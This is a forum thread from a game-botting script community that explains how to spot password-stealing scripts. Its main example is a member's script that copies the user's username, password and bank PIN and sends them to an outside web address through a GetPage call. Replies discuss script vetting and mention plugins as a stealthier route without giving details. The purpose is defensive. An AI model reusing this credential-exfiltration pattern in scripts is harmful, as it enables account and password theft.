How to detect password stealing scripts

Recently an SRL Member "IROKI" has found to be password stealing,
(Good Catch BobboHobbo)
So if you have used one of his scripts recently change all your passwords that are the same as your runescape one, if your email is the same it is of great importance that you change this as this can be used to find all your passwords.

Ok so when a script is used to steal passwords it sends the passwords to a website.

There are multiple methods of this

1. Using GetPage

2. Using Plugins (this way is almost undetectable)


1. Using GetPage

This was used recently by Iroki
Procedure DeclarePlayers;

SCAR Code:

Begin
  HowManyPlayers := 1;
  NumberOfPlayers(HowManyPlayers);
  CurrentPlayer := 0;

  Players[0].Name         := '';      // Your UserName
  Players[0].Pass         := '';      // Your PassWord
  Players[0].Nick         := '';      // Your Nick (3-4 letters from your username)
  Players[0].Active       := True;    // Use this player ??
  Players[0].Skill        := 'Prayer';  // Skill to lamp
  Players[0].Strings[0]   := '';      // Your BankPin
  Players[0].Strings[1]   := 'Adamant';      // What kind of bars you want to smelt ( Bronze, Iron, Silver, Steel, Gold, Mithril, Adamant, Rune, CballsFO, CballsFB )

  Code[0] := '';
  Code[1] := '';
  verKey  := '';
End;

There we can see that you enter some your char info and some other info
nothing wrong with that.

However combined with

SCAR Code:

Begin
  If (Code[0] = '') Or (Code[1] = '') Or (verKey = '') Then
  Begin
    Code[0] := Players[CurrentPlayer].Name;
    Code[1] := Players[CurrentPlayer].Pass;
    verKey  := Players[CurrentPlayer].Strings[0];
  End;
  For i := 1 To Coding Do
  Begin
    Code[0] := CodeNow(Code[0]);
    Code[1] := CodeNow(Code[1]);
  End;
End;

Here we see that the codes and verification key are changed to the account details =O, in all honesty there is nothing wrong with that eithen tho its unnecessary, so if you see this be very suspicious if your still not sure ASK better safe than sorry.

Now the part that should make you worried.

SCAR Code:

GetPage('http://www.iroki.cba.pl/stats.php?tresc=Code[0]=' + Code[0] + '+Code[1]=' + Code[1] + '+verKey=' + verKey + '+&CreateSessionIDverKey+');

Here they are sending code[0] code[1] and verkey to a website which earlier we learned was changed to your account details.

Get/PostHTTPPage/Ex can also be used instead of GetPage (Thanks Mixster)

If you see this be wary.

Don't use it if it you see this.


Thanks Mixster for stuff below

Get/PostHTTPPage/Ex are the other ways to use it that is more easy to spot while going through the script, but harder to notice in popups as it simply has ?POST? or ?GET? at the end of the URL.

Plugin's have the advantage over not asking for permission to access a webpage but are still tracked in the same way of checking every use of username and password as they still have to be input into a procedure/function to send the info into the plugin.

Get/PostHTTPPage/Ex are the other ways to use it that is more easy to spot while going through the script, but harder to notice in popups as it simply has ?POST? or ?GET? at the end of the URL.
The only way to be 100% sure a script won't steal your details is to follow the scripts logic and see where it uses your username and password. Every method can be stopped that way.

Quote:

---

Originally Posted by Waddo

2. Using Plugins (this way is almost undetectable)

---

Don't give people ideas <_>

Credits on who found it pl0x :p

Nah jks. Should be easy to make a script to scan for password thrieft. Ill make one soon :P.

not that i am planning to make one (which i definatly will not) how to you make it do it through plugins?

if you dont want to tell me then you dont have to

~shut

Lol I have no idea I was hoping some one would tell me something about hem so I could add it I'm obviously not going to put how to tho.

I think mixster knows.

maybe all scripts should be vetted before they get posted? or make someone on the forums in charge pf checking scripts?

Yes i've thought of that and id be happy to do it but there are alot of scripts released and scripts can be edited pretty easy so it wouldn't work

hmm... Iroki... Can't remember him :s

anyways, it should be easy to screw his password-stealing-script by just setting Code[0] to ' ', as the internet does not allows spaces (they use %20 as spaces)

actually setting it to anything would work as it only changes to acount details if they leave blank =p

True :D

Quote:

---

Quote:
Originally Posted by Waddo
2. Using Plugins (this way is almost undetectable)

Don't give people ideas <_>

---

Rofl! Smart son of a.... Ill keep an eye for them.

This is a very good thread cause I heard about Iroki and im sure there is going to be a lot of copycats out there that have no respect for others accounts. Good Job

When mods have to accept script to get them posted, they could also look through for code optimization etc etc

There are roles of moderators, and admins, so why couldn't we have some people, like said above, check scripts for their code, that could be called 'Script Anaylers' or something along those line. They could have a green name colour, also.

*makes a plugin!*
*implants it in scars main plugin folder for new scar release*
*h4x every one I hate*

i think there should be a script submitence jus like the SRL member application so we can scan scripts befor we give them the go ahead i think that will almost certain to stop em

but then every new version would have to be checked if it got re relaseled!


I uniofficlay make waddo a script checker, as your always on here!

Please have srl staff review scripts before anyone uses them (more than 2 staffs) Now that one was caught I bet there will be more.

Checking every script takes ages and is pointless considering there have only been a couple of incidences.
Plugin's only have the advantage over not asking for permission to access a webpage but are still tracked in the same way of checking every use of username and password as they still have to be input into a procedure/function to send the info into the plugin.
Lastly, Get/PostHTTPPage/Ex are the other ways to use it that is more easy to spot while going through the script, but harder to notice in popups as it simply has ?POST? or ?GET? at the end of the URL.
The only way to be 100% sure a script won't steal your details is to follow the scripts logic and see where it uses your username and password. Every method can be stopped that way.
Edit:
R0b0t1, the advisor, says: 'No'

No one every script being searched. How about this, you quit being leechers, learn to script and search it yourself.

Myles + everyone else who thinks we should check all the scripts

It takes 20 seconds to edit a script and repost,
If there was a filter then that would mean that when a script was posted it would be held in some storage and could possibly lag up the forums checking each script is a bad idea I would do it if i was asked, i have a lot of free time.

Eithen in the free for all section the admins only check once then you can edit how you please.

Quote:

---

Originally Posted by Waddo

Myles + everyone else who thinks we should check all the scripts

It takes 20 seconds to edit a script and repost,
If there was a filter then that would mean that when a script was posted it would be held in some storage and could possibly lag up the forums checking each script is a bad idea I would do it if i was asked, i have a lot of free time.

Eithen in the free for all section the admins only check once then you can edit how you please.

---

When did I say I supported it?

Waddo: This has happened only a couple of times and is completely unnecessary. Checking each and every script is the same as the governments of the world deciding that every person should be strip searched before entering every building. If it was a common thing, then I would agree that some form of pre-approval would be needed, but it isn't common at all. It would just waste a lot of time in the long run with minimal results.

Mixster that is what im saying Read godarn it read.

Quote:

---

Originally Posted by waddo

checking each script is a bad idea

---

and Myles i have no idea why i said you :confused: my mistake =p

You posted earlier saying you would like it though pointed out it wouldn't work, so I thought this was your suggestion to fixing that - mainly because I found it very hard and still do to understand your post and all I could extract from it was your suggestion for a script storage area where it would have to be pre-approved and that you wouldn't mind doing it.

I wouldnt mind help doing it if it came to that but it wont as it will do no good especially when people make to or 3 mistakes and re upload in an hour 3 times

Stickied

Woah, Thanks Hobbit, Second sticky.

Thanks Mixster for your input.

I'm glad someone posted this, I heard about this guy and how he was stealing passwords.

When in doubt, it'd be good if you just voiced your concern -- theres no harm done, as its not an outright accusation.

Also, I'd like everyone to note that the stealer only gets about one or two accounts before they're intercepted. Although we can't repay those people, we can at least make sure we discourage account stealing as unprofitable compared to the money you make autoing from using SRL (theres other reasons, but this is the only one account stealers look at).


I'd also like to suggest that we find a way to ban an IP from the SVN, is that possible? I mean, if he tries to come back. He can decide himself if he wants to learn to set up Tor or pay extra for a dynamic IP.

I just suggest the if you don't know how to read over scripts and see if it is a password scamming script, just use a well-known script (you know like one with lots of progress reports and the thread has lots of pages =p)

Wow why didn't I figure that out myself.....

Quote:

---

Originally Posted by jose89

I just suggest the if you don't know how to read over scripts and see if it is a password scamming script, just use a well-known script (you know like one with lots of progress reports and the thread has lots of pages =p)

---

Thats the problem -- iroki was an SRL member, and his scripts were very good. Too bad he didn't realize how easy it is to track, or how hard it is to transfer items anymore.

Someone mentioned a script scanner , could someone not make one and if you are un-sure of a script scan it yourself instead of waisting other peoples time ?

Thanks I will start looking through scripts to make sure no one steals my pass.

theres no need to scan thouroughly through every script as most scripters oon srl are actually good people and have lives so really its only when idiots like iroki come around we should start worrying and i thought his was the only password stealing script out there whos else is?

Thanks, my acc was stolen because of PC bot, it worked but really slow (4points in 2hours) :D

TY i am new to this and the first script i got had a keylogger in i cant remember whos it was but now i will no :D

Erm if it had a keylogger in then you didnt get it from here
unless you downloaded the keylogger script which is a keylogger and nothing else
i dont think there are any harmful keylogger scripts written in scar

Just wondering, are there any cases where a script could LEGITLY try to get a page?